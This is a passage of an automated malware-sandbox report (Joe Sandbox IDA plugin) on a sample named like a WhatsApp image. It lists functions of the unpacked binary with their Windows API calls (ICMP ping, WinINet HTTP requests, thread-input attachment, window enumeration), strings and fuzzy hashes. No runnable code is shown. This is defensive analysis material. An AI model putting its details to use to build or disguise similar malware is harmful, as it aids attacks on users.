Function 000D8107 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 000D8168
inet_addr.WSOCK32(?,?,?), ref: 000D81AD
gethostbyname.WSOCK32(?), ref: 000D81B9
IcmpCreateFile.IPHLPAPI ref: 000D81C7
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 000D8237
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 000D824D
IcmpCloseHandle.IPHLPAPI(00000000), ref: 000D82C2
WSACleanup.WSOCK32 ref: 000D82C8

Strings

Ping, xrefs: 000D81EB

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 70330fae41d62246fc97eb9923af3e1647fe752565e9c7d2dd5c070098964ec8
Instruction ID: 5eae82f924270f6271a24edffedb04dc0d7d4e1c73f6ab894aeb740a4116576c
Opcode Fuzzy Hash: 70330fae41d62246fc97eb9923af3e1647fe752565e9c7d2dd5c070098964ec8
Instruction Fuzzy Hash: BA51BE31604700AFDB20EF64DC45B6AB7E4BF48320F04896AF999DB3A1DB70E941DB52

Function 000E9E43 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000E9E5B
CreateMenu.USER32 ref: 000E9E76
SetMenu.USER32(?,00000000), ref: 000E9E85
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000E9F12
IsMenu.USER32(?), ref: 000E9F28
CreatePopupMenu.USER32 ref: 000E9F32
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 000E9F63
DrawMenuBar.USER32 ref: 000E9F71

Strings

0, xrefs: 000E9E54

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
String ID: 0
API String ID: 176399719-4108050209
Opcode ID: c4baaf47f9deeaffa877d43e1a56d92103e7c20cc6b9fa325c315b0fb40384e2
Instruction ID: af9a64f0e2afad270aef0e1a97a930182c41c1692a033ec07079c5ba727a774b
Opcode Fuzzy Hash: c4baaf47f9deeaffa877d43e1a56d92103e7c20cc6b9fa325c315b0fb40384e2
Instruction Fuzzy Hash: 114143B8A00249AFDB20DFA5E884BEABBF5FF49314F144129ED85A7361D770A950CF50

Function 000CE389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 000CE396
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 000CE40C
GetLastError.KERNEL32 ref: 000CE416
SetErrorMode.KERNEL32(00000000,READY), ref: 000CE483

Strings

READONLY, xrefs: 000CE44E
NOTREADY, xrefs: 000CE442
UNKNOWN, xrefs: 000CE43B
READY, xrefs: 000CE45C
INVALID, xrefs: 000CE455

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 52824978368c02e848225e822dc448e068af6ac1e20e0581b613103129f709c5
Instruction ID: 4e6538ca33f80445fa93fab6ecc2a5c490af8fb7703f8190152b7d48d84edc10
Opcode Fuzzy Hash: 52824978368c02e848225e822dc448e068af6ac1e20e0581b613103129f709c5
Instruction Fuzzy Hash: F8318135A002499FDB15EBA4D845FADB7F4FF04300F14802AF545EB292DB70AA42CB51

Function 000BB907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 000BB98C
GetDlgCtrlID.USER32 ref: 000BB997
GetParent.USER32 ref: 000BB9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 000BB9B6
GetDlgCtrlID.USER32(?), ref: 000BB9BF
GetParent.USER32(?), ref: 000BB9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 000BB9DE

Strings

ComboBox, xrefs: 000BB911
ListBox, xrefs: 000BB949

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: 560b6d46eba75a2cbca4ffef807f13e8499b40f5d1c8995e955f120c95cc5b52
Instruction ID: 546d012d7965d3a123ee9c075afde5f08544fa55c92ade9dfff0e9983601fef7
Opcode Fuzzy Hash: 560b6d46eba75a2cbca4ffef807f13e8499b40f5d1c8995e955f120c95cc5b52
Instruction Fuzzy Hash: 6F218374900104BFDB04EBA4DC86EFEBBB5EF49310F10411AF691972E2DBB59959DB20

Function 000BB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 000BBA73
GetDlgCtrlID.USER32 ref: 000BBA7E
GetParent.USER32 ref: 000BBA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 000BBA9D
GetDlgCtrlID.USER32(?), ref: 000BBAA6
GetParent.USER32(?), ref: 000BBAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 000BBAC5

Strings

ComboBox, xrefs: 000BB9FA
ListBox, xrefs: 000BBA32

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: aa38d6313754e0b7ccf49480f015d10d7fa0aeb6cffe8da0d4e86501bdda17be
Instruction ID: 32a9dff13f26f52ca3ac372e95a447ce60c39d850e3346143207c589dc6cb894
Opcode Fuzzy Hash: aa38d6313754e0b7ccf49480f015d10d7fa0aeb6cffe8da0d4e86501bdda17be
Instruction Fuzzy Hash: 202192B4A40108BFDB01AFA4DC85EFEBBB9FF49300F144016F591A7292EBB559599B20

Function 000BBAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 000BBAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 000BBAF8
_wcscmp.LIBCMT ref: 000BBB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 000BBB85

Strings

details, xrefs: 000BBB33
list, xrefs: 000BBB67
largeicons, xrefs: 000BBB19
SHELLDLL_DefView, xrefs: 000BBB04
smallicons, xrefs: 000BBB4D

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: ee1b93e253f8491e8e56beb13105699ccc24804138b8cb7b1f62be33f6ee9e23
Instruction ID: 4aefe534d85525eb6f18712813e6087b3f07fb59370c9f4524acfb9d1bb6cc26
Opcode Fuzzy Hash: ee1b93e253f8491e8e56beb13105699ccc24804138b8cb7b1f62be33f6ee9e23
Instruction Fuzzy Hash: 44110276608307FFFA207670EC06DEA379C9B12760F200022FA08E68DAEFE2A8514514

Function 000DB2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 000DB2D5
CoInitialize.OLE32(00000000), ref: 000DB302
CoUninitialize.OLE32 ref: 000DB30C
GetRunningObjectTable.OLE32(00000000,?), ref: 000DB40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 000DB539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 000DB56D
CoGetObject.OLE32(?,00000000,0010D91C,?), ref: 000DB590
SetErrorMode.KERNEL32(00000000), ref: 000DB5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 000DB623
VariantClear.OLEAUT32(0010D91C), ref: 000DB633

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 707d4d9eb0be2dc5abc742cd073a637ef0952124a02bde135a2bccb492fb438d
Instruction ID: 61eb88e897ef5fa88de23e81e6a573a754650e991ba64b9cf5cb2c19e218a3d4
Opcode Fuzzy Hash: 707d4d9eb0be2dc5abc742cd073a637ef0952124a02bde135a2bccb492fb438d
Instruction Fuzzy Hash: 07C11371608301EFC700EF68D884A6AB7E9BF89348F05491EF58A9B351DB71ED45CB62

Function 000AACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 000AACC1

Part of subcall function 000A7CF4: __mtinitlocknum.LIBCMT ref: 000A7D06
Part of subcall function 000A7CF4: EnterCriticalSection.KERNEL32(00000000,?,000A7ADD,0000000D), ref: 000A7D1F

__calloc_crt.LIBCMT ref: 000AACD2

Part of subcall function 000A6986: __calloc_impl.LIBCMT ref: 000A6995
Part of subcall function 000A6986: Sleep.KERNEL32(00000000,000003BC,0009F507,?,0000000E), ref: 000A69AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 000AACED
GetStartupInfoW.KERNEL32(?,00136E28,00000064,000A5E91,00136C70,00000014), ref: 000AAD46
__calloc_crt.LIBCMT ref: 000AAD91
GetFileType.KERNEL32(00000001), ref: 000AADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 000AAE11

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 5e5900eab70deaf5faeb3b086966db4b2eb34ae09c3195e348c30e16145b02c8
Instruction ID: afa9305bed42f1f689c78ce678fa4050e793090d18dc363a1447d3cf631ff0ff
Opcode Fuzzy Hash: 5e5900eab70deaf5faeb3b086966db4b2eb34ae09c3195e348c30e16145b02c8
Instruction Fuzzy Hash: B781B671A053458FDB24CFE8D8405ADBBF0AF0B324B24426DE4A6AB7D2D7359843CB56

Function 000C67E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 000C67FD
__swprintf.LIBCMT ref: 000C680A

Part of subcall function 000A172B: __woutput_l.LIBCMT ref: 000A1784

FindResourceW.KERNEL32(?,?,0000000E), ref: 000C6834
LoadResource.KERNEL32(?,00000000), ref: 000C6840
LockResource.KERNEL32(00000000), ref: 000C684D
FindResourceW.KERNEL32(?,?,00000003), ref: 000C686D
LoadResource.KERNEL32(?,00000000), ref: 000C687F
SizeofResource.KERNEL32(?,00000000), ref: 000C688E
LockResource.KERNEL32(?), ref: 000C689A
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 000C68F9

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
String ID:
API String ID: 1433390588-0
Opcode ID: 06a22cd696b92367487711a870ec7389838c67dd7712251272c7221e889ac111
Instruction ID: 6c66eae6a208cf2d0baac7a7f0fc2af6ee48aa623cfe0e0a3457a2089f767107
Opcode Fuzzy Hash: 06a22cd696b92367487711a870ec7389838c67dd7712251272c7221e889ac111
Instruction Fuzzy Hash: D831927590021ABBDB219FA0ED55EBF7BA8FF08340F004529F941D2150EB75D995DB70

Function 000C4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000C4047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,000C30A5,?,00000001), ref: 000C405B
GetWindowThreadProcessId.USER32(00000000), ref: 000C4062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000C30A5,?,00000001), ref: 000C4071
GetWindowThreadProcessId.USER32(?,00000000), ref: 000C4083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,000C30A5,?,00000001), ref: 000C409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,000C30A5,?,00000001), ref: 000C40AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,000C30A5,?,00000001), ref: 000C40F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,000C30A5,?,00000001), ref: 000C4108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,000C30A5,?,00000001), ref: 000C4113

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 6ecde5f13e1c1f9429887990aa5de7d542f19f76cd9a9f01367ca954b880a5ae
Instruction ID: c5689759dcf3b3a3f1a8cb1355bc716816874ac56d439e6efdc2c5985977f053
Opcode Fuzzy Hash: 6ecde5f13e1c1f9429887990aa5de7d542f19f76cd9a9f01367ca954b880a5ae
Instruction Fuzzy Hash: 43319175500204AFDB20DF54EC96F6D77EAFB55321F14800AFE54E66A0CBB599C08B60

Function 000FDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0009B496
SetTextColor.GDI32(?,000000FF), ref: 0009B4A0
SetBkMode.GDI32(?,00000001), ref: 0009B4B5
GetStockObject.GDI32(00000005), ref: 0009B4BD
GetClientRect.USER32(?), ref: 000FDD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 000FDD7A
GetWindowDC.USER32(?), ref: 000FDD86
GetPixel.GDI32(00000000,?,?), ref: 000FDD95
ReleaseDC.USER32(?,00000000), ref: 000FDDA7
GetSysColor.USER32(00000005), ref: 000FDDC5

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: a31afbef5a0691b471b37c9c6a57e6375b65c5865f1395209aa876089752cff8
Instruction ID: 1ea1c0e588c19a3e06c7c41428ab0c483354fbcbab450de996ad44fc058b0220
Opcode Fuzzy Hash: a31afbef5a0691b471b37c9c6a57e6375b65c5865f1395209aa876089752cff8
Instruction Fuzzy Hash: 53114C31500205AFDB616BB4FC08BA97FB1EB05335F108625FAA6954E1CBB24991EB20

Function 000BCB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,000BCF50), ref: 000BCE90

Strings

CLASS, xrefs: 000BCC10
REGEXPCLASS, xrefs: 000BCC56
TEXT, xrefs: 000BCDC7
INSTANCE, xrefs: 000BCD9E
NAME, xrefs: 000BCCC2
CLASSNN, xrefs: 000BCC33

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: cd195a5617ee2b363f2fed3afe966254172335f517af25a355efdd725f323ca0
Instruction ID: 779e8103dbe21d2ffb348b3cc7d2f7c0c4ecf7f855abaf2fe9f1ffb192cefbdc
Opcode Fuzzy Hash: cd195a5617ee2b363f2fed3afe966254172335f517af25a355efdd725f323ca0
Instruction Fuzzy Hash: 17917370600546DBDB58EF60C482FEEFBB5BF04300F548529D569A7252DF30A95ADBE0

Function 00083093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 000830DC
CoUninitialize.OLE32(?,00000000), ref: 00083181
UnregisterHotKey.USER32(?), ref: 000832A9
DestroyWindow.USER32(?), ref: 000F5079
FreeLibrary.KERNEL32(?), ref: 000F50F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 000F5125

Strings

close all, xrefs: 000830D7

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 2674766e35a2382414bdc43f42933a98b7ee9e7cbafd0bfa438c2faf534a1918
Instruction ID: 49efff68f120862b97d8b453c8d8667b03551abd5d7ee41872881af346f9bb9d
Opcode Fuzzy Hash: 2674766e35a2382414bdc43f42933a98b7ee9e7cbafd0bfa438c2faf534a1918
Instruction Fuzzy Hash: CB913A302006068FC715EF24C899FA9F3B4BF44705F5582A9E68AA7662DF30AE56DF50

Function 0009CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0009CC15

Part of subcall function 0009CCCD: GetClientRect.USER32(?,?), ref: 0009CCF6
Part of subcall function 0009CCCD: GetWindowRect.USER32(?,?), ref: 0009CD37
Part of subcall function 0009CCCD: ScreenToClient.USER32(?,?), ref: 0009CD5F

GetDC.USER32 ref: 000FD137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000FD14A
SelectObject.GDI32(00000000,00000000), ref: 000FD158
SelectObject.GDI32(00000000,00000000), ref: 000FD16D
ReleaseDC.USER32(?,00000000), ref: 000FD175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000FD200

Strings

U, xrefs: 000FD0D5

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 4d2a3e1e8df14eeea814aa7d3f86e638c37c1806d9fb98d6f873123e394c287a
Instruction ID: 2cca2e719b72cc09812f3afbccef5955069aa8bb69e9fff44c111eeb2db2ccbe
Opcode Fuzzy Hash: 4d2a3e1e8df14eeea814aa7d3f86e638c37c1806d9fb98d6f873123e394c287a
Instruction Fuzzy Hash: 5071BF74800209EFDF619F64C885EFE7BB6FF49310F18426AEE555A6A6C7318881EF50

Function 000D45C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000D45FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 000D462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 000D466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 000D4682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 000D46BF
InternetCloseHandle.WININET(00000000), ref: 000D4706

Part of subcall function 000D5052: GetLastError.KERNEL32(?,?,000D43CC,00000000,00000000,00000001), ref: 000D5067

Strings

, xrefs: 000D46B8

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: ff59b2989521e4446c3732020680e86a2858ccab6f6d1490d8f092a39b8d5121
